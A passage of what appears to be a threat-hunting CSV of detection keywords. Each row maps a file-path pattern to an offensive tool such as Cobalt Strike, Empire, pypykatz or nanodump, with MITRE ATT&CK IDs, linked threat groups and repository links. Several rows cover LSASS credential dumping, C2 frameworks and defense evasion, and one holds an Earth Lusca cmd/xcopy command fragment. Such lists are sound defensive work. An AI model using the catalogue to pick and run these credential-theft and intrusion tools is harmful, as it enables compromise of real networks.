Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*/loot_default/*.exe*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" +"*/loot_default/*.ps1*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" +"*/loot_default/*.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" +"*/loot_finder*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" +"*/lpBunny/bof-registry*","offensive_tool_keyword","cobaltstrike","Cobalt Strike beacon object file that allows you to query and make changes to the Windows Registry","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/ausecwa/bof-registry","1","1","N/A","10","10","17","7","2021-02-11T04:38:28Z","2021-01-29T05:07:47Z" +"*/lsa_dump_*.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*/lsass.DMP*","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","1","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z" +"*/lsass/beacon.h*","offensive_tool_keyword","cobaltstrike","Collection of CobaltStrike beacon object files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/pwn1sher/CS-BOFs","1","1","N/A","10","10","100","23","2022-02-14T09:47:30Z","2021-01-18T08:54:48Z" +"*/LSASSProtectionBypass/CredGuard.c*","offensive_tool_keyword","EDRSandblast-GodFault","Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/gabriellandau/EDRSandblast-GodFault","1","1","N/A","10","2","183","35","2023-08-28T18:14:20Z","2023-06-01T19:32:09Z" +"*/LsassSilentProcessExit.git*","offensive_tool_keyword","LsassSilentProcessExit","Command line interface to dump LSASS memory to disk via SilentProcessExit","T1003.001 - T1059.003","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/deepinstinct/LsassSilentProcessExit","1","1","N/A","10","5","422","64","2020-12-23T11:51:21Z","2020-11-29T08:49:42Z" +"*/lsassy*","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/Hackndo/lsassy","1","1","N/A","N/A","10","1745","232","2023-10-04T19:25:30Z","2019-12-03T14:03:41Z" +"*/lsassy_dump.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*/lucksec/CVE-2022-0847*","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","T1543","TA0003","N/A","N/A","Exploitation tools","https://github.com/lucksec/CVE-2022-0847","1","1","N/A","N/A","1","1","4","2022-03-08T01:50:39Z","2022-03-08T01:17:09Z" +"*/lu-enum.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/luijait/arpspoofing*","offensive_tool_keyword","arpspoofing","arp spoofing scripts","T1595","TA0001","N/A","N/A","Network Exploitation tools","https://github.com/luijait/arpspoofing","1","1","N/A","N/A","1","15","1","2022-03-10T04:44:36Z","2021-06-29T22:57:51Z" +"*/ly4k/Pachine*","offensive_tool_keyword","Pachine","Python implementation for CVE-2021-42278 (Active Directory Privilege Escalation)","T1068 - T1078 - T1059.006","TA0003 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/ly4k/Pachine","1","1","N/A","8","3","262","37","2022-01-13T12:35:19Z","2021-12-13T23:15:05Z" +"*/lyncsmash/*","offensive_tool_keyword","lyncsmash","a collection of tools to enumerate and attack self-hosted Skype for Business and Microsoft Lync installations ","T1190 - T1087 - T1110","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/nyxgeek/lyncsmash","1","1","N/A","N/A","4","323","68","2023-05-03T19:07:11Z","2016-05-20T04:32:41Z" +"*/LyncSniper.ps1*","offensive_tool_keyword","SprayingToolkit","Scripts to make password spraying attacks against Lync/S4B. OWA & O365 a lot quicker. less painful and more efficient","T1110 - T1078 - T1133 - T1061","TA0001 - TA0002 - TA0003","N/A","N/A","Credential Access","https://github.com/byt3bl33d3r/SprayingToolkit","1","1","N/A","10","10","1352","268","2022-10-17T01:01:57Z","2018-09-13T09:52:11Z" +"*/m *.lnk* /c *cmd /c echo f|xcopy @file %temp%*","offensive_tool_keyword","Earth Lusca Operations Tools","Earth Lusca Operations Tools and commands","T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1584.004 - T1584.006 - T1543.003 - T1140 - T1482 - T1189 - T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - T1018 - T1053 - T1608.001 - T1218.005 - T1016 - T1053 - T1049 - T1033 - T1016 - T1049 - T1016 - T1218.001 - T1016 - T1049 - T1033 - T1007 - T1218.005","TA0001 - TA0002 - TA0003","cobaltstrike - mimikatz - powersploit - shadowpad - winnti","Earth Lusca","Exploitation tools","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/m3-gen.py *","offensive_tool_keyword","MaliciousMacroMSBuild","Generates Malicious Macro and Execute Powershell or Shellcode via MSBuild Application Whitelisting Bypass.","T1059.001 - T1059.003 - T1127 - T1027.002","TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/infosecn1nja/MaliciousMacroMSBuild","1","0","N/A","8","5","488","117","2019-08-06T08:16:05Z","2018-04-09T23:16:30Z" +"*/m4ll0k/*","offensive_tool_keyword","Github Username","github username 'hacker' hosting exploitaitont tools and passwords attacks tools","N/A","N/A","N/A","N/A","Credential Access","https://github.com/m4ll0k","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/m8r0wn/*","offensive_tool_keyword","Github Username","pentester github username hosting exploitation tools","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/m8r0wn","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/MAAD-AF.git*","offensive_tool_keyword","MAAD-AF","MAAD Attack Framework - An attack tool for simple fast & effective security testing of M365 & Azure AD. ","T1078.001 - T1552.001 - T1558.001 - T1003.001 - T1110.003 - T1555.003 - T1558.002 - T1087.001 - T1087.002 - T1214.001 - T1562.001 - T1088 - T1559.001 - T1106 - T1204","TA0006 - TA0004 - TA0008 - TA0007 - TA0002 - TA0005","N/A","N/A","Network Exploitation tools","https://github.com/vectra-ai-research/MAAD-AF","1","1","N/A","N/A","3","293","43","2023-09-27T02:49:59Z","2023-02-09T02:08:07Z" +"*/MaccaroniC2*","offensive_tool_keyword","MaccaroniC2","A proof-of-concept Command & Control framework that utilizes the powerful AsyncSSH Python library which provides an asynchronous client and server implementation of the SSHv2 protocol and use PyNgrok wrapper for ngrok integration.","T1090 - T1059.003","TA0011 - TA0002","N/A","N/A","C2","https://github.com/CalfCrusher/MaccaroniC2","1","1","N/A","10","10","57","9","2023-06-27T17:43:59Z","2023-05-21T13:33:48Z" +"*/MacroMeter*","offensive_tool_keyword","MacroMeter","VBA Reversed TCP Meterpreter Stager CSharp Meterpreter Stager build by Cn33liz and embedded within VBA using DotNetToJScript from James Forshaw https://github.com/tyranid/DotNetToJScript","T1027 - T1059 - T1564 - T1071","TA0002 - TA0003 - TA0008","N/A","N/A","POST Exploitation tools","https://github.com/Cn33liz/MacroMeter","1","0","N/A","N/A","1","62","31","2018-04-23T09:14:49Z","2017-05-16T20:04:41Z" +"*/MacroPatterns.cs*","offensive_tool_keyword","Macrome","An Excel Macro Document Reader/Writer for Red Teamers & Analysts. Blog posts describing what this tool actually does can be found https://malware.pizza/2020/05/12/evading-av-with-excel-macros-and-biff8-xls/ and https://malware.pizza/2020/06/19/further-evasion-in-the-forgotten-corners-of-ms-xls/","T1140","TA0005","N/A","N/A","Exploitation tools","https://github.com/michaelweber/Macrome","1","1","N/A","N/A","6","522","83","2022-02-01T16:26:13Z","2020-05-07T22:44:11Z" +"*/Macro-Payloads.py*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*/MacroWord_Payload/macro.txt*","offensive_tool_keyword","Mystikal","macOS Initial Access Payload Generator","T1059.005 - T1204.002 - T1566.001","TA0002 - TA0001","N/A","N/A","Exploitation tools","https://github.com/D00MFist/Mystikal","1","1","N/A","9","3","245","35","2023-05-10T15:21:26Z","2021-05-03T14:46:16Z" +"*/magnitude.profile*","offensive_tool_keyword","cobaltstrike","Malleable C2 is a domain specific language to redefine indicators in Beacon's communication. This repository is a collection of Malleable C2 profiles that you may use. These profiles work with Cobalt Strike 3.x","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/Malleable-C2-Profiles","1","1","N/A","10","10","1362","429","2021-05-18T14:45:39Z","2014-07-14T15:02:42Z" +"*/MailRaider.ps1*","offensive_tool_keyword","DBC2","DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.","T1105 - T1071.004 - T1102","TA0003 - TA0002 - TA0008","N/A","N/A","C2","https://github.com/Arno0x/DBC2","1","1","N/A","10","10","269","85","2017-10-27T07:39:02Z","2016-12-14T10:35:56Z" +"*/MailRaider.ps1*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1129","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*/MailSniper/*","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. or by an administrator to search the mailboxes of every user in a domain.","T1114 - T1134.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","1","N/A","N/A","10","2626","554","2022-10-20T08:13:33Z","2016-09-08T00:36:51Z" +"*/main/cve-2022-0847.c*","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","t1543","TA0003","N/A","N/A","Exploitation tools","https://github.com/bbaranoff/CVE-2022-0847","1","1","N/A","N/A","1","49","25","2022-03-07T15:52:23Z","2022-03-07T15:50:18Z" +"*/main/exploit.js","offensive_tool_keyword","POC","Adobe Acrobat Reader - CVE-2023-21608 - Remote Code Execution Exploit ","T1203 - T1218 - T1059 - T1064 - T1204","TA0001 - TA0002","N/A","N/A","Exploitation tools","https://github.com/hacksysteam/CVE-2023-21608","1","1","N/A","N/A","3","250","57","2023-02-27T04:51:20Z","2023-01-30T12:57:48Z" +"*/main/exploit.pdf","offensive_tool_keyword","POC","Adobe Acrobat Reader - CVE-2023-21608 - Remote Code Execution Exploit ","T1203 - T1218 - T1059 - T1064 - T1204","TA0001 - TA0002","N/A","N/A","Exploitation tools","https://github.com/hacksysteam/CVE-2023-21608","1","1","N/A","N/A","3","250","57","2023-02-27T04:51:20Z","2023-01-30T12:57:48Z" +"*/MaliciousMacroMSBuild*","offensive_tool_keyword","MaliciousMacroMSBuild","Generates Malicious Macro and Execute Powershell or Shellcode via MSBuild Application Whitelisting Bypass.","T1059.001 - T1059.003 - T1127 - T1027.002","TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/infosecn1nja/MaliciousMacroMSBuild","1","1","N/A","8","5","488","117","2019-08-06T08:16:05Z","2018-04-09T23:16:30Z" +"*/malleable-c2*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/malleable-c2","1","1","N/A","10","10","1329","282","2023-08-01T15:07:51Z","2018-08-14T14:19:43Z" +"*/MalSCCM.git*","offensive_tool_keyword","MalSCCM","This tool allows you to abuse local or remote SCCM servers to deploy malicious applications to hosts they manage","T1072 - T1059.005 - T1090","TA0008 - TA0002 - TA0011","N/A","N/A","Exploitation tools","https://github.com/nettitude/MalSCCM","1","1","N/A","10","3","223","34","2023-09-28T17:29:50Z","2022-05-04T08:27:27Z" +"*/MalSCCM.sln*","offensive_tool_keyword","MalSCCM","This tool allows you to abuse local or remote SCCM servers to deploy malicious applications to hosts they manage","T1072 - T1059.005 - T1090","TA0008 - TA0002 - TA0011","N/A","N/A","Exploitation tools","https://github.com/nettitude/MalSCCM","1","1","N/A","10","3","223","34","2023-09-28T17:29:50Z","2022-05-04T08:27:27Z" +"*/malseclogon.*","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","1467","208","2023-09-04T01:25:27Z","2021-11-10T18:28:15Z" +"*/MalStuff.cpp*","offensive_tool_keyword","D1rkInject","Threadless injection that loads a module into the target process and stomps it and reverting back memory protections and original memory state","T1055 - T1055.012 - T1055.002 - T1574.002","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/D1rkInject","1","1","N/A","9","2","129","24","2023-08-02T02:45:46Z","2023-08-02T02:13:55Z" +"*/man_in_the_browser/*.js*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*/man_in_the_browser/*.rb*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*/manage/exec_cmd*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" +"*/Management/C2/*","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1021 - T1021.002 - T1022 - T1032 - T1043 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Apollo/","1","1","N/A","10","10","401","83","2023-08-17T14:46:04Z","2020-11-09T08:05:16Z" +"*/manjusaka/plugins*","offensive_tool_keyword","cobaltstrike","Chinese clone of cobaltstrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/YDHCUI/manjusaka","1","1","N/A","10","10","664","132","2023-05-09T03:31:53Z","2022-03-18T08:16:04Z" +"*/MANSPIDER.git*","offensive_tool_keyword","MANSPIDER","Spider entire networks for juicy files sitting on SMB shares. Search filenames or file content - regex supported!","T1046 - T1021 - T1021.002 - T1114 - T1114.001 - T1083","TA0007 - TA0009 - TA0010","N/A","N/A","Discovery","https://github.com/blacklanternsecurity/MANSPIDER","1","1","N/A","8","8","773","119","2023-10-04T11:08:17Z","2020-03-18T13:27:20Z" +"*/manspider_*.log*","offensive_tool_keyword","MANSPIDER","Spider entire networks for juicy files sitting on SMB shares. Search filenames or file content - regex supported!","T1046 - T1021 - T1021.002 - T1114 - T1114.001 - T1083","TA0007 - TA0009 - TA0010","N/A","N/A","Discovery","https://github.com/blacklanternsecurity/MANSPIDER","1","0","N/A","8","8","773","119","2023-10-04T11:08:17Z","2020-03-18T13:27:20Z" +"*/manspider_output*.txt","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*/manspiderDump*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*/masky.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*/master/GPSCoordinates/*","offensive_tool_keyword","GPSCoordinates","Tracks the system's GPS coordinates (accurate within 1km currently) if Location Services are enabled","T1018 - T1059.001","TA0001 - TA0002","N/A","N/A","Reconnaissance","https://github.com/matterpreter/OffensiveCSharp/tree/master/GPSCoordinates","1","1","N/A","10","10","1214","252","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" +"*/master/JunctionFolder/*","offensive_tool_keyword","JunctionFolder","Creates a junction folder in the Windows Accessories Start Up folder as described in the Vault 7 leaks. On start or when a user browses the directory - the referenced DLL will be executed by verclsid.exe in medium integrity.","T1547.001 - T1574.001 - T1204.002","TA0005 - TA0004","N/A","N/A","Persistence - Defense Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/JunctionFolder","1","1","N/A","10","10","1214","252","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" +"*/master/PhantomService/*","offensive_tool_keyword","PhantomService","Searches for and removes non-ASCII services that can't be easily removed by built-in Windows tools","T1050.005 - T1055.001 - T1070.004","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/PhantomService","1","1","N/A","10","10","1214","252","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" 